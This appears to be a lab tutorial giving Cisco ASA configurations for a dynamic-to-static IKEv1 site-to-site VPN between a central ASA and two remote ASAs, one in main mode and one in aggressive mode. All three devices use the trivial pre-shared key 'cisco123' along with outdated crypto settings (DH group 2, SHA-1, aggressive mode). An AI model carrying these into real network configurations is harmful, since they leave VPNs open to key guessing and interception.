ASA IKEv1 Dynamic-to-Static S2S VPN

 

Remote 1 uses main mode with default tunnel-group, Remote 2 uses aggressive mode with named tunnel-group.

Central ASA

! Create objects

object network obj-10.1.2.0_24

 subnet 10.1.2.0 255.255.255.0

object network obj-10.1.1.0_24

 subnet 10.1.1.0 255.255.255.0

object network obj-10.1.3.0_24

 subnet 10.1.3.0 255.255.255.0

!Create NAT exemption for L2L VPN and dynamic NAT for Internet access.

nat (inside,outside) source static obj-10.1.2.0_24 obj-10.1.2.0_24 destination static obj-10.1.1.0_24 obj-10.1.1.0_24 no-proxy-arp route-lookup

nat (inside,outside) source static obj-10.1.2.0_24 obj-10.1.2.0_24 destination static obj-10.1.3.0_24 obj-10.1.3.0_24 no-proxy-arp route-lookup

!

object network obj-10.1.2.0_24

 nat (inside,outside) dynamic interface

! Define IKEv1 policy

crypto ikev1 policy 10

 authentication pre-share

 encryption aes-256

 hash sha

 group 2

! Enable ikev1 on outside interface 

crypto ikev1 enable outside

! Define transform-set

crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac

! Configure dynamic map with:

• Requires transform-set
• (Optional) Enable Reverse Route Injection (RRI), which allows ASA to learn routing information for connected clients, dynamic keyword will delete the learned static route when VPN is down.

crypto dynamic-map outside_dyn_map 1 set ikev1 transform-set T-SET

crypto dynamic-map outside_dyn_map 1 set reverse-route (dynamic)

! Bind the dynamic map to crypto map

crypto map outside_map 65535 ipsec-isakmp dynamic outside_dyn_map

! Enable crypto map  on outside interface 

crypto map outside_map interface outside

! Solution1:Remote1 has dynamic public IP, will use default tunnel-group since can’t specify tunnel-group with IP address.

tunnel-group DefaultL2LGroup ipsec-attributes

 ikev1 pre-shared-key cisco123

! Solution2:Remote2 has dynamic public IP, but it specified isakmp identity, create tunnel-group to match Remote2 identity

tunnel-group SPOKE1 type ipsec-l2l

tunnel-group SPOKE1 ipsec-attributes

 ikev1 pre-shared-key cisco123

Remote 1 ASA

! Create objects:

object network obj-10.1.1.0_24

 subnet 10.1.1.0 255.255.255.0

object network obj-10.1.2.0_24

 subnet 10.1.2.0 255.255.255.0

!Create NAT exemption for L2L VPN and dynamic NAT for Internet access.

nat (inside,outside) source static obj-10.1.1.0_24 obj-10.1.1.0_24 destination static obj-10.1.2.0_24 obj-10.1.2.0_24 no-proxy-arp route-lookup

!

object network obj-10.1.1.0_24

 nat (inside,outside) dynamic interface

! Define ikev1 policy:

crypto ikev1 policy 10

 authentication pre-share

 encryption aes-256

 hash sha

 group 2

! Enable ikev1 on outside interface

crypto ikev1 enable outside

! Define transform-set

crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac

! Create VPN-ACL

access-list outside_cryptomap extended permit ip object obj-10.1.1.0_24 object obj-10.1.2.0_24

! Configure crypto map

crypto map outside_map 1 match address outside_cryptomap

crypto map outside_map 1 set peer 172.16.2.1

crypto map outside_map 1 set ikev1 transform-set T-SET

! Enable crypto map  on outside interface

crypto map outside_map interface outside

!Creat tunnel-group

tunnel-group 172.16.2.1 type ipsec-l2l

tunnel-group 172.16.2.1 ipsec-attributes

 ikev1 pre-shared-key cisco123

Remote 2 ASA

! Create objects:

object network obj-10.1.3.0_24

 subnet 10.1.3.0 255.255.255.0

object network obj-10.1.2.0_24

 subnet 10.1.2.0 255.255.255.0

!Create NAT exemption for L2L VPN and dynamic NAT for Internet access.

nat (inside,outside) source static obj-10.1.3.0_24 obj-10.1.3.0_24 destination static obj-10.1.2.0_24 obj-10.1.2.0_24  no-proxy-arp route-lookup

!

object network obj-10.1.3.0_24

 nat (inside,outside) dynamic interface

! Define ikev1 policy:

crypto ikev1 policy 10

 authentication pre-share

 encryption aes-256

 hash sha

 group 2

! Enable ikev1 on outside interface

crypto ikev1 enable outside

! Define transform-set

crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac

! Create VPN-ACL

access-list VPN-ACL extended permit ip object obj-10.1.3.0_24 object obj-10.1.2.0_24

! Configure static crypto map, aggressive mode let HUB ASA use non-default tunnel-group.

! In aggressive Mode, the initiator and responder ID pass in the clear. 

crypto map MyMap 10 match address VPN-ACL

crypto map MyMap 10 set peer 172.16.2.1

crypto map MyMap 10 set ikev1 phase1-mode aggressive

crypto map MyMap 10 set ikev1 transform-set T-SET

! Set ike identity so it will use specified tunnel-group instead of default tunnel-group

crypto isakmp identity key-id SPOKE1

! Enable crypto map on outside interface

crypto map MyMap  interface outside

!Creat tunnel-group

tunnel-group 172.16.2.1 type ipsec-l2l

tunnel-group 172.16.2.1 ipsec-attributes

 ikev1 pre-shared-key cisco123

=============================

Reference:

https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/119007-config-asa9x-ike-ipsec-00.html